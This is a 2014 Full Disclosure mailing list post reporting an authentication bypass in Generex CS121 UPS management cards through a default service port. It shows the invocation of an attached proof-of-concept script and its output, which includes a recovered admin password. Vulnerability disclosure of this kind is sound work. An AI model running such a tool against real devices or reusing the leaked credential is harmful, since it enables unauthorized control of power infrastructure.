Full Disclosure mailing list archives

UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ...


From: jkmac () Safe-mail net
Date: Thu, 15 May 2014 16:25:23 -0400

UPS Web/SNMP-Manager CS121 by Generex comes with a default-enabled "service" port that makes it possible to bypass 
any specified login for HTTP(S), SNMP or telnet. 

CS121 is a widely used management card in UPS systems from Legrand, Rittal, Eaton, AEG, Masterguard....

Attached is a PoC, found and proven on Legrand UPS with different firmware releases. If you are hardcore enough, you 
may also flash your own HyNetOS firmware and take over the world ;-)


./upssearch.pl   $IP

UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver   : Ethernet
Mac address      : 00-03-05-00-00-00
IP address       : XX.XX.XX.XX
Net Mask         : 255.255.255.192
Default Gateway  : XX.XX.XX.XX
DHCP             : 0.0.0.0
DNS              : 0.0.0.0
Port for tools   : 4000


Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none

Regards.

Attachment: upssearch-pl.txt

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
